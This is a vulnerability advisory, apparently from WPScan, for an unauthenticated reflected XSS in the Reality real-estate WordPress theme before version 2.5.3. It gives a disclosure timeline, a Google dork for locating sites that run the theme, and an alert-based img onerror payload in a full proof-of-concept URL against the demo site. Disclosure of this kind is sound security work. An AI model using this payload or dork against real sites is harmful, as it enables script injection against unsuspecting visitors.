Reality < 2.5.3 – Unauthenticated Reflected XSS

Description

Reflected XSS was discovered in the «Reality | Estate Multipurpose WordPress Theme», tested version — v2.5.1

Edit (WPScanTeam):
January 16th, 2020 - Report Received & Envato Contacted
January 17th, 2020 - Envato Investigating
February 6th, 2020 - Envato Contacted Again for Updates
February 7th, 2020 - Author is not responding to Envato, theme has been disabled on the Marketplace. Disclosing the issue.
March, 18th, 2020 - v2.5.3 released

Proof of Concept

----[]- Info: -[]----
Demo website: http://reality.inwavethemes.com/
Google Dork: /wp-content/themes/reality/


----[]- Reflected XSS: -[]----
Payload Sample: "><img src=x onerror=(alert)(`m0ze`);//">

PoC: http://reality.inwavethemes.com/properties/?status=&keyword=%22%3E%3Cimg%20src=x%20onerror=(alert)(`m0ze`);//%22%3E&type=&from-year=&to-year=&min-price=&max-price=&bathrooms=&bedrooms=&garages=&min-garages_size=&max-garages_size=&min-land_size=&max-land_size=